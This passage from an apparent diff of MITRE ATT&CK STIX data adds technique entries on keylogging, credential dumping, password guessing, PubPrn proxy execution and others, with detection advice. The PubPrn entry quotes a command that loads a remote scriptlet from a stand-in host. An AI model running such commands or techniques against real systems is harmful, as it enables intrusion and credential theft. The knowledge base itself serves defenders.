"attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0836", + "external_id": "T0836" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Digital Certificates", + "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", + "created": "2020-10-02T16:58:58.738Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1596/003", + "external_id": "T1596.003" + }, + { + "source_name": "SSLShopper Lookup", + "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.", + "url": "https://www.sslshopper.com/ssl-checker.html" + }, + { + "source_name": "Medium SSL Cert", + "description": "Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020.", + "url": "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-01T14:01:12.167Z", + "name": "Keylogging", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "TruKno" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "created": "2020-02-11T18:58:11.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1056/001", + "external_id": "T1056.001" + }, + { + "source_name": "Talos Kimsuky Nov 2021", + "description": "An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.", + "url": "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "Adventures of a Keystroke", + "description": "Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.", + "url": "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:58.991Z", + "name": "Modify Controller Tasking", + "description": "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller. \n\nAccording to 61131-3, the association of a Task with a Program Organization Unit (POU) defines a task association. (Citation: IEC February 2013) An adversary may modify these associations or create new ones to manipulate the execution flow of a controller. Modification of controller tasking can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append.\n\nTasks have properties, such as interval, frequency and priority to meet the requirements of program execution. Some controller vendors implement tasks with implicit, pre-defined properties whereas others allow for these properties to be formulated explicitly. An adversary may associate their program with tasks that have a higher priority or execute associated programs more frequently. For instance, to ensure cyclic execution of their program on a Siemens controller, an adversary may add their program to the task, Organization Block 1 (OB1).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0821", + "external_id": "T0821" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T23:42:39.831Z", + "name": "File/Path Exclusions", + "description": "Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)\n\nAdversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "created": "2024-03-29T16:59:10.374Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/012", + "external_id": "T1564.012" + }, + { + "source_name": "Microsoft File Folder Exclusions", + "description": "Microsoft. (2024, February 27). Contextual file and folder exclusions. Retrieved March 29, 2024.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T17:54:22.970Z", + "name": "Linux and Mac File and Directory Permissions Modification", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", + "created": "2020-02-04T19:24:27.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1222/002", + "external_id": "T1222.002" + }, + { + "source_name": "Hybrid Analysis Icacls1 June 2018", + "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.", + "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100" + }, + { + "source_name": "Hybrid Analysis Icacls2 May 2018", + "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.", + "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110" + }, + { + "source_name": "20 macOS Common Tools and Techniques", + "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", + "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-16T16:57:41.743Z", + "name": "Password Guessing", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n* SNMP (161/UDP and 162/TCP/UDP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Microsoft Threat Intelligence Center (MSTIC)", + "Mohamed Kmal" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "created": "2020-02-11T18:38:22.617Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1110/001", + "external_id": "T1110.001" + }, + { + "source_name": "Trend Micro Emotet 2020", + "description": "Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.", + "url": "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi" + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "PubPrn", + "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Atul Nair, Qualys" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "created": "2020-02-03T16:49:57.788Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1216/001", + "external_id": "T1216.001" + }, + { + "source_name": "pubprn", + "description": "Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn" + }, + { + "source_name": "Enigma0x3 PubPrn Bypass", + "description": "Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.", + "url": "https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Purchase Technical Data", + "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", + "created": "2020-10-02T17:05:43.562Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1597/002", + "external_id": "T1597.002" + }, + { + "source_name": "ZDNET Selling Data", + "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020.", + "url": "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-18T23:47:41.667Z", + "name": "OS Credential Dumping", + "description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Vincent Le Toux", + "Ed Williams, Trustwave, SpiderLabs", + "Tim (Wadhwa-)Brown", + "Yves Yonan" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "### Windows\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. \n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n\n### Linux\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the `/proc` filesystem for the process being analyzed. This file is stored under the path `/proc//maps`, where the `` directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "created": "2017-05-31T21:30:19.735Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003", + "external_id": "T1003" + }, + { + "source_name": "Medium Detecting Attempts to Steal Passwords from Memory", + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea" + }, + { + "source_name": "AdSecurity DCSync Sept 2015", + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", + "url": "https://adsecurity.org/?p=1729" + }, + { + "source_name": "Microsoft DRSR Dec 2017", + "description": "Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.", + "url": "https://msdn.microsoft.com/library/cc228086.aspx" + }, + { + "source_name": "Microsoft NRPC Dec 2017", + "description": "Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.", + "url": "https://msdn.microsoft.com/library/cc237008.aspx" + }, + { + "source_name": "Microsoft GetNCCChanges", + "description": "Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.", + "url": "https://msdn.microsoft.com/library/dd207691.aspx" + }, + { + "source_name": "Microsoft SAMR", + "description": "Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.", + "url": "https://msdn.microsoft.com/library/cc245496.aspx" + }, + { + "source_name": "Powersploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "url": "https://github.com/mattifestation/PowerSploit" + }, + { + "source_name": "Samba DRSUAPI", + "description": "SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.", + "url": "https://wiki.samba.org/index.php/DRSUAPI" + }, + { + "source_name": "Harmj0y DCSync Sept 2015", + "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.", + "url": "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/" + }, + { + "source_name": "Brining MimiKatz to Unix", + "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", + "url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-12T21:17:14.868Z", + "name": "Shared Modules", + "description": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on 